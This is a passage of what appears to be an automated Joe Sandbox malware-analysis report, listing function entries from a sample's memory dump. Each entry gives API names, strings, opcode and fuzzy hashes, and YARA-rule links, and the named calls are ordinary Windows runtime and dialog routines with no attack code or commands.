                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscpy
                                                                                                                                                                                                              • String ID: &nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                              • API String ID: 1284135714-864536935
                                                                                                                                                                                                              • Opcode ID: 4800b2c24e7164cdc2d63349d62e6157d8d1c35bedcee7baf7a48d82aa651b38
                                                                                                                                                                                                              • Instruction ID: 311969dd13096d4f5f4267576cf332ea67210d9c4f69b2887f20c965d56c456a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4800b2c24e7164cdc2d63349d62e6157d8d1c35bedcee7baf7a48d82aa651b38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF316355E096C2C2EA61BB61D5501F9E361EF54B84FCC8032DA8D07699EE7CF4828335
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA31F0 Relevance: 9.1, APIs: 6, Instructions: 74timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                              • Opcode ID: 6fe600c340fd9802f51f7f0e62a0b889c68c58184e2ffd37e23f4a69c40ca345
                                                                                                                                                                                                              • Instruction ID: 33e71526a2bc401451aa31c7feb1ca4395b1ea52c3c3a590aa01cf21721ba962
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fe600c340fd9802f51f7f0e62a0b889c68c58184e2ffd37e23f4a69c40ca345
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1310776B10692CAEB10DFB5D8401ED73B0FB0CB4C7895126EA4D93A58EF38D894C728
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB68B8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                              • API String ID: 2889003569-2084237596
                                                                                                                                                                                                              • Opcode ID: 471dcbce960d690d05db94a7ca5e7cf4ad9d191dede20343963ddb5981cb7302
                                                                                                                                                                                                              • Instruction ID: d4e8568e59a03469c40e44c8c094f7dfec4996d5f50b232e8aec7b9607ca992f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 471dcbce960d690d05db94a7ca5e7cf4ad9d191dede20343963ddb5981cb7302
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58919F73A08786CAE711AB74E8402EDBBA1FB05788F58412AEA8D47B55DF38D995C700
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB5B58 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                              • API String ID: 2395640692-629598281
                                                                                                                                                                                                              • Opcode ID: f23558f3b55ab5811c05d4f830243c0703e59613b80302f4b97b883ca13d1970
                                                                                                                                                                                                              • Instruction ID: 3f1a5d813c7d45147a3364494312a7dee7ecae95b2afe7fa0d4186cfa66406f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f23558f3b55ab5811c05d4f830243c0703e59613b80302f4b97b883ca13d1970
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D51D132B09686C7D754EF25E408AA9B396FB44B84F988130DE0A43B4CDF39EE41C719
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB1A30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text$Dialog
                                                                                                                                                                                                              • String ID: RENAMEDLG
                                                                                                                                                                                                              • API String ID: 2638039312-3299779563
                                                                                                                                                                                                              • Opcode ID: 4f8bf267d8144bbe1dfc49916d7516fadadf11eaab2188db66a25276201e4adf
                                                                                                                                                                                                              • Instruction ID: 3d55db5620caf2dc526b18894dfe945d0fc2c5e07272e8d91799f7eda09ffc34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f8bf267d8144bbe1dfc49916d7516fadadf11eaab2188db66a25276201e4adf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29219061A08BC2C7F754AB26A5443BDA3A5AB45FC0F9C8136DA0D03B94CF2DE8468324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB2244 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                              • API String ID: 0-56093855
                                                                                                                                                                                                              • Opcode ID: 003eff63f361b9bace8ab20c22d18a4f05b99d915ab0dda8486e16e47a7a3962
                                                                                                                                                                                                              • Instruction ID: 2fc1faac042f2c421ebf7c4132fc4a0cd63e37ace7ec0c02bc38eb6cb1413e6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 003eff63f361b9bace8ab20c22d18a4f05b99d915ab0dda8486e16e47a7a3962
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E421E364A0DBC7D6FB15AB25B8402F9F3A4BB49784F88443AD94D86224DF7CE445C324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBC8FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                              • Opcode ID: 1edc7a242c6f303e79851a22714c11e279823059ed2222e817ff31a8189a1f6b
                                                                                                                                                                                                              • Instruction ID: 71a08ccf37d799f595b69f72883afc51a3d1400a44713f9e0ce0197815c50a83
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1edc7a242c6f303e79851a22714c11e279823059ed2222e817ff31a8189a1f6b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63F04F62E19A83C2FE55AF31F4443FAA360AF88B90F8C5435D95F46664DE3CD844C724
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC56C8 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                              • Opcode ID: a12116f795de4817994ec8ecb31ecb63e8023060816e07705c80b17cdf8ec1ec
                                                                                                                                                                                                              • Instruction ID: 78b664f58145ec34fa43521cfb8306e49f21307b6792e6926f430458d02ffa45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a12116f795de4817994ec8ecb31ecb63e8023060816e07705c80b17cdf8ec1ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F819D22E28693C5F710BF7598846FEA6A0BB48B98F884135DD4E53695CF3CE6428320
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC503C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3659116390-0
                                                                                                                                                                                                              • Opcode ID: 84eb20b548abd459b2a43762cc13bfcb32aeff2f5a3404e642623a6f1e25acbc
                                                                                                                                                                                                              • Instruction ID: e42882b3e341778d207780ee4806ae3a81cbc7adc97bd5697b28bbae782d1306
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84eb20b548abd459b2a43762cc13bfcb32aeff2f5a3404e642623a6f1e25acbc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E518F32A24A92C5E710EF75D8483EEB7B0FB48B98F488135DE4A47699DF38D546C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC6264 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                              • Opcode ID: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                                                                                              • Instruction ID: b1d1b6c9ec8ce3a63bade74e2f07b5a6e32f0a299b3965585509886acfaabe72
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F111A322F1CA83D1F7543979E446BFB91436F95370F8C8639E97E0A5DACE2DA4444124
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB2190 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3621893840-0
                                                                                                                                                                                                              • Opcode ID: 2382faf6a70c2a355994166d8c6e85122c42246cf4729fd9ef338276bf00fede
                                                                                                                                                                                                              • Instruction ID: fe4504abd965756abb496a6d7011bcb71faac03e77f82902c1009e12f2f1767c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2382faf6a70c2a355994166d8c6e85122c42246cf4729fd9ef338276bf00fede
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F06261B3848283FB10AB31F855BBAA225EFE4B05FC81030E64E81854DE3CD54ACB20
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA3334 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadStringswprintf
                                                                                                                                                                                                              • String ID: %ls$%s: %s
                                                                                                                                                                                                              • API String ID: 1984293314-2259941744
                                                                                                                                                                                                              • Opcode ID: b51712049b80b3e9528931c18a2633c42c60fd4f9567b8ac4dab9cf633a351a4
                                                                                                                                                                                                              • Instruction ID: 9925f1af3354e59b4d76f86ae878ec071cec5b7602570c09d3ed6e67cab3dca4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b51712049b80b3e9528931c18a2633c42c60fd4f9567b8ac4dab9cf633a351a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E812D21E8E5C3C2F66B397DC5682FD85829F81344EDC8336C68F46ED9DD2EA9449231
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB6E2C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __except_validate_context_recordabort
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 746414643-3733052814
                                                                                                                                                                                                              • Opcode ID: 5776aa0e9b111a11ba4543d8f5d6bc7e4cf726ece5945f364da8c139d66e783d
                                                                                                                                                                                                              • Instruction ID: 5364e905efb374045432566fd76d591a1fa54635c52c235759fe1da5b722001f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5776aa0e9b111a11ba4543d8f5d6bc7e4cf726ece5945f364da8c139d66e783d
